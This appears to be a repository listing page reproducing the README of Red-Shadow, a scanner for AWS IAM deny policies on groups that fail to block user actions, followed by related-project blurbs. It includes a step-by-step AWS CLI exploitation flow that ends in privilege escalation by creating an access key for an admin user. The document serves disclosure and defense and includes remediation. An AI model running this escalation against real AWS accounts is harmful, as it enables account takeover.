Lightspin AWS IAM Vulnerability Scanner

Overview

red-shadow

Red-Shadow

Lightspin AWS IAM Vulnerability Scanner

Description

Scan your AWS IAM Configuration for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups discovered by Lightspin's Security Research Team.

The tool detects the misconfigurations in the following IAM Objects:

  • Managed Policies

  • Users Inline Policies

  • Groups Inline Policies

  • Roles Inline Policies

Research Summary

AWS IAM evaluation logic for deny policies applied to groups does not work the same way as most security engineers may be used to with other authorization mechanisms.

Suppose a policy with a group resource has an explicit deny. In that case, this will only impact group actions and not user actions, opening organizations up to misconfiguration and vulnerabilities if they assume the process to be the same as with Active Directory, for example.

Example for vulnerable json policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "ProtectManagersByDeny",
            "Effect": "Deny",
            "Action": "*",
            "Resource": "arn:aws:iam::123456789999:group/managers"
        }
    ]
}

In this example, the policy should deny any iam action done by users, groups, or roles with that policy attached to, towards the group called managers.

The fact is that simple IAM action like iam:ChangePassword would work as the deny policy is ineffective.

Link to the full security research blog

Detection

AWS IAM has a clear seperation between user object actions and group object actions.

The following list includes the user object actions the tool is scanning over deny policies affecting groups (besides wildcard):

AWS_USER_ACTIONS = ["iam:CreateUser",
                     "iam:GetUser",
                     "iam:UpdateUser",
                     "iam:DeleteUser",
                     "iam:GetUserPolicy",
                     "iam:PutUserPolicy",
                     "iam:DeleteUserPolicy",
                     "iam:ListUserPolicies",
                     "iam:AttachUserPolicy",
                     "iam:DetachUserPolicy",
                     "iam:ListAttachedUserPolicies",
                     "iam:SimulatePrincipalPolicy",
                     "iam:GetContextKeysForPrincipalPolicy",
                     "iam:TagUser",
                     "iam:UpdateSSHPublicKey",
                     "iam:UntagUser",
                     "iam:GetSSHPublicKey",
                     "iam:ListUserTags",
                     "iam:DeleteSSHPublicKey",
                     "iam:GetLoginProfile",
                     "iam:GetAccessKeyLastUsed",
                     "iam:UpdateLoginProfile",
                     "iam:UploadSigningCertificate",
                     "iam:DeleteLoginProfile",
                     "iam:ListSigningCertificates",
                     "iam:CreateLoginProfile",
                     "iam:UpdateSigningCertificate",
                     "iam:EnableMFADevice",
                     "iam:DeleteSigningCertificate",
                     "iam:ResyncMFADevice",
                     "iam:ListServiceSpecificCredentials",
                     "iam:ListMFADevices",
                     "iam:ResetServiceSpecificCredential",
                     "iam:DeactivateMFADevice",
                     "iam:CreateServiceSpecificCredential",
                     "iam:ChangePassword",
                     "iam:UpdateServiceSpecificCredential",
                     "iam:CreateAccessKey",
                     "iam:DeleteServiceSpecificCredential",
                     "iam:ListAccessKeys",
                     "iam:PutUserPermissionsBoundary",
                     "iam:UpdateAccessKey",
                     "iam:DeleteUserPermissionsBoundary",
                     "iam:DeleteAccessKey",
                     "iam:ListGroupsForUser",
                     "iam:ListSSHPublicKeys",
                     "iam:UploadSSHPublicKey"]

Many of the user object actions mentioned above can easily lead to a privilege escalation or compromising the account, such as resetting the admin's password, deactivating the root account MFA, and more.

Requirements

Red-Shadow is built with Python 3 and Boto3.

The tool requires:

Installation

sudo git clone https://github.com/lightspin-tech/red-shadow.git
cd red-shadow
pip3 install -r requirements.txt

Usage

python3 red-shadow.py

Analyze Results

The results discover any IAM object that is vulnerable to such authorization bypass in AWS.

Example of results output:

++ Starting Red-Shadow ++

++ AWS IAM Vulnerability Scanner
++ Red Shadow scans for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups

Step 1: Searching for IAM Group misconfigurations in managed policies
Found potential misconfiguration at arn:aws:iam::123456789999:policy/ProtectManagers
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 2: Searching for IAM Group misconfigurations in Users inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 3: Searching for IAM Group misconfigurations in Groups inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 4: Searching for IAM Group misconfigurations in Roles inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Done

In this console output, we can see that our ProtectManagers deny policy is ineffective and vulnerable to attacks such as privilege escalation mentioned above.

Simulation & Exploitation

To validate the IAM Vulnerability and run the exploitation you can run the following flow:

  1. aws iam create-group --group-name managers
  2. aws iam attach-group-policy --group-name managers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
  3. aws iam create-user --user-name JohnAdmin
  4. aws iam add-user-to-group --user-name JohnAdmin --group-name managers
  5. create a policy.json file with the contents below (replace the account id):
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ProtectManagersByDeny",
      "Effect": "Deny",
      "Action": "*",
      "Resource": "arn:aws:iam::123456789999:group/managers"
    }
  ]
}
  1. aws iam create-policy --policy-name ProtectManagers --policy-document file://policy.json
  2. aws iam create-group --group-name backend-dev
  3. aws iam create-user --user-name BobAttacker
  4. aws iam add-user-to-group --user-name BobAttacker --group-name backend-dev
  5. aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/ProtectManagers
  6. Create a policy to allow the users to create access keys in policy_iam.json file for the backend-dev group:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "iam:CreateAccessKey",
            "Resource": "*"
        }
    ]
}
  1. aws iam create-policy --policy-name devCreateAccessKeys --policy-document file://policy_iam.json
  2. aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/devCreateAccessKeys
  3. Validate our configuration using: aws iam list-attached-group-policies --group backend-dev
  4. aws iam create-access-key --user-name BobAttacker
  5. Configure the new access key and secret in aws profile (locan env)
  6. Now the user BobAttacker can create access key for all resources but has an explicit deny for the managers group.

Lets Exploit the vulnerability using:

aws iam create-access-key --user-name JohnAdmin --profile BobAttacker

Privilege Escalation Complete!

Remediation

Once you have found the policies vulnerable to the authorization bypass, there are two possible ways to remediate the vulnerability and fix the policy:

OPTION 1: Define all relevant users in the resource field instead of groups to avoid ineffective iam actions, and deny all group actions, such as the following example:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenySpecificUserActions",
            "Effect": "Deny",
            "Action": [
                "iam:CreateLoginProfile",
                "iam:ChangePassword",
                "iam:CreateAccessKey"
            ],
            "Resource": [
                "arn:aws:iam::123456789999:user/[email protected]",
                "arn:aws:iam::123456789999:user/[email protected]",
                "arn:aws:iam::123456789999:user/[email protected]"
            ]
        },
        {
            "Sid": "DenyAllGroupActions",
            "Effect": "Deny",
            "Action": "*",
            "Resource": "arn:aws:iam::123456789999:group/managers"
        }
    ]
}

OPTION 2: Use condition in the policy with iam:ResourceTag in place such as the following example:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Deny",
            "Action": [
                "iam:CreateLoginProfile",
                "iam:ChangePassword",
                "iam:CreateAccessKey"
            ],
            "Resource": "*",
            "Condition": {
                "ForAnyValue:StringEquals": {
                    "iam:ResourceTag/group": "managers"
                }
            }
        }
    ]
}

Contact Us

This research was held by Lightspin's Security Research Team. For more information, contact us at [email protected].

License

This repository is available under the Apache License 2.0.

You might also like...
Jenkins-AWS-CICD - Implement Jenkins CI/CD with AWS CodeBuild and AWS CodeDeploy, build a python flask web application.
Jenkins-AWS-CICD - Implement Jenkins CI/CD with AWS CodeBuild and AWS CodeDeploy, build a python flask web application.

Jenkins-AWS-CICD - Implement Jenkins CI/CD with AWS CodeBuild and AWS CodeDeploy, build a python flask web application.

Implement backup and recovery with AWS Backup across your AWS Organizations using a CI/CD pipeline (AWS CodePipeline).
Implement backup and recovery with AWS Backup across your AWS Organizations using a CI/CD pipeline (AWS CodePipeline).

Backup and Recovery with AWS Backup This repository provides you with a management and deployment solution for implementing Backup and Recovery with A

IP Denial of Service Vulnerability
IP Denial of Service Vulnerability ")A proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability ")

CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc

Moodle community-based vulnerability scanner
Moodle community-based vulnerability scanner

badmoodle Moodle community-based vulnerability scanner Description badmoodle is an unofficial community-based vulnerability scanner for moodle that sc

An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.
An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.

Log4JHunt An automated, reliable scanner for the Log4Shell CVE-2021-44228 vulnerability. Video demo: Usage Here the help usage: $ python3 log4jhunt.py

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3
Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR

wsvuls - website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.]
wsvuls - website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.]

WSVuls Website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.] What's WSVuls? WSVuls is a simple and powerf

Js File Scanner This is Js File Scanner
Js File Scanner This is Js File Scanner

Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.

Visualize Data From Stray Scanner https://keke.dev/blog/2021/03/10/Stray-Scanner.html

StrayVisualizer A set of scripts to work with data collected using Stray Scanner. Usage Installing Dependencies Install dependencies with pip -r requi

Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.
Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Yuyu Scanner Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets. installation ! run as root

USSR-Scanner - USSR Scanner with python
USSR-Scanner - USSR Scanner with python

Purposes ? Hey there is abosolutely no need to do this we do it only to irritate

This repository lets you train neural networks models for performing end-to-end full-page handwriting recognition using the Apache MXNet deep learning frameworks on the IAM Dataset.
This repository lets you train neural networks models for performing end-to-end full-page handwriting recognition using the Apache MXNet deep learning frameworks on the IAM Dataset.

Handwritten Text Recognition (OCR) with MXNet Gluon These notebooks have been created by Jonathan Chung, as part of his internship as Applied Scientis

Handwritten Text Recognition (HTR) system implemented with TensorFlow (TF) and trained on the IAM off-line HTR dataset. This Neural Network (NN) model recognizes the text contained in the images of segmented words.

Handwritten-Text-Recognition Handwritten Text Recognition (HTR) system implemented with TensorFlow (TF) and trained on the IAM off-line HTR dataset. T

AWSXenos will list all the trust relationships in all the IAM roles and S3 buckets
AWSXenos will list all the trust relationships in all the IAM roles and S3 buckets

AWS External Account Scanner Xenos, is Greek for stranger. AWSXenos will list all the trust relationships in all the IAM roles, and S3 buckets, in an

Compares and analyzes GCP IAM roles.

gcp-iam-analyzer I wrote this to help in my day to day working in GCP. A lot of the time I am doing role comparisons to see which role has more permis

Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Automatically compile an AWS Service Control Policy that ONLY allows AWS services that are compliant with your preferred compliance frameworks.
Automatically compile an AWS Service Control Policy that ONLY allows AWS services that are compliant with your preferred compliance frameworks.

aws-allowlister Automatically compile an AWS Service Control Policy that ONLY allows AWS services that are compliant with your preferred compliance fr

SSH-Restricted deploys an SSH compliance rule (AWS Config) with auto-remediation via AWS Lambda if SSH access is public.
SSH-Restricted deploys an SSH compliance rule (AWS Config) with auto-remediation via AWS Lambda if SSH access is public.

SSH-Restricted SSH-Restricted deploys an SSH compliance rule with auto-remediation via AWS Lambda if SSH access is public. SSH-Auto-Restricted checks

Owner
Lightspin
Take Your Cloud Security Beyond Compliance
Lightspin
Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

About create a target list or select one target, scans then exploits, done! Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool t

Nano 108 Dec 4, 2021
DIAL(Did I Alert Lambda?) is a centralised security misconfiguration detection framework which completely runs on AWS Managed services like AWS API Gateway, AWS Event Bridge & AWS Lambda

DIAL(Did I Alert Lambda?) is a centralised security misconfiguration detection framework which completely runs on AWS Managed services like AWS API Gateway, AWS Event Bridge & AWS Lambda

CRED 71 Dec 29, 2022
Validate all your Customer IAM Policies against AWS Access Analyzer - Policy Validation

✅ Access Analyzer - Batch Policy Validator This script will analyze using AWS Access Analyzer - Policy Validation all your account customer managed IA

Victor GRENU 41 Dec 12, 2022
It's a simple python script to take backup of directories (compressing) then the same to move your mentioned S3 bucket with the help of AWS IAM User.

Directory Backup Moved to S3 (Pyscript) Description Here it's a python script that needs to use this script simply create a directory backup and moved

Yousaf K Hamza 3 Mar 4, 2022
Demonstration that AWS IAM policy evaluation docs are incorrect

The flowchart from the AWS IAM policy evaluation documentation page, as of 2021-09-12, and dating back to at least 2018-12-27, is the following: The f

Ben Kehoe 15 Oct 21, 2022
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈

An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet ??

Brandon Galbraith 276 Mar 3, 2021
Automated AWS account hardening with AWS Control Tower and AWS Step Functions

Automate activities in Control Tower provisioned AWS accounts Table of contents Introduction Architecture Prerequisites Tools and services Usage Clean

AWS Samples 20 Dec 7, 2022
AWS Interactive CLI - Allows you to execute a complex AWS commands by chaining one or more other AWS CLI dependency

AWS Interactive CLI - Allows you to execute a complex AWS commands by chaining one or more other AWS CLI dependency

Rafael Torres 2 Dec 10, 2021
A simple URL shortener app using Python AWS Chalice, AWS Lambda and AWS Dynamodb.

url-shortener-chalice A simple URL shortener app using AWS Chalice. Please make sure you configure your AWS credentials using AWS CLI before starting

Ranadeep Ghosh 2 Dec 9, 2022